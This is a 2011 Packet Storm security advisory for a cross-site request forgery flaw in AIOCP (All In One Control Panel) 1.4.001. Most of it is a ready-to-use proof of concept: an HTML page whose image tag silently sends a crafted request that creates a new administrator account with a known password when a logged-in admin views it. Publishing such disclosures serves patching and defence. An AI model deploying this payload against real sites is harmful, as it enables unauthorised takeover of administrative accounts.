AIOCP (All In One Control Panel) 1.4.001 Cross Site Request Forgery

2011-02-07T00:00:00
ID PACKETSTORM:98247
Type packetstorm
Reporter AutoSec Tools
Modified 2011-02-07T00:00:00

Description

                                        
                                            `<!------------------------------------------------------------------------  
# Software................AIOCP (All In One Control Panel) 1.4.001  
# Vulnerability...........Cross-site Request Forgery  
# Download................http://www.tecnick.com/public/code/cp_dpage.php?aiocp_dp=aiocp  
# Release Date............2/2/2011  
# Tested On...............Windows Vista + XAMPP  
# ------------------------------------------------------------------------  
# Author..................AutoSec Tools  
# Site....................http://www.autosectools.com/  
# ------------------------------------------------------------------------  
#   
# --Description--  
#   
# A cross-site request forgery vulnerability in AIOCP (All In One  
# Control Panel) 1.4.001 can be exploited to create a new admin.  
#   
#   
# --PoC-->  
<html>  
<body>  
<img src="http://localhost/aiocp/admin/code/cp_edit_user.php?uemode=&user_agreed=I+AGREE&user_id=2&user_name=new_admin&user_email=x%40x.com&x_user_email=%5E%28%5Ba-zA-Z0-9_%5C.%5C-%5D%2B%29%40%28%28%5C%5B%5B0-9%5D%7B1%2C3%7D%5C.%5B0-9%5D%7B1%2C3%7D%5C.%5B0-9%5D%7B1%2C3%7D%5C.%29%7C%28%28%5Ba-zA-Z0-9%5C-%5D%2B%5C.%29%2B%29%29%28%5Ba-zA-Z%5D%7B2%2C4%7D%7C%5B0-9%5D%7B1%2C3%7D%29%28%5C%5D%3F%29%24&xl_user_email=email&newpassword=Password1&user_password=81dc9bdb52d04dc20036dbd8313ed055&newpassword_repeat=Password1&user_regdate=2002-10-13+08%3A38%3A31&user_ip=127.0.0.1&user_level=10&user_language=eng&user_firstname=&user_lastname=&user_birthdate=0000-00-00&x_user_birthdate=%28%5B0-9%5D%7B4%7D%29-%28%5B0-9%5D%7B1%2C2%7D%29-%28%5B0-9%5D%7B1%2C2%7D%29&xl_user_birthdate=birth+date&user_birthplace=&user_piva=&user_fc=&MAX_FILE_SIZE=500000&user_photo=_blank.png&user_signature=&user_notes=&menu_mode=add&ff_required=user_name&ff_required_labels=name&adm=1" />  
</body>  
</html>  
`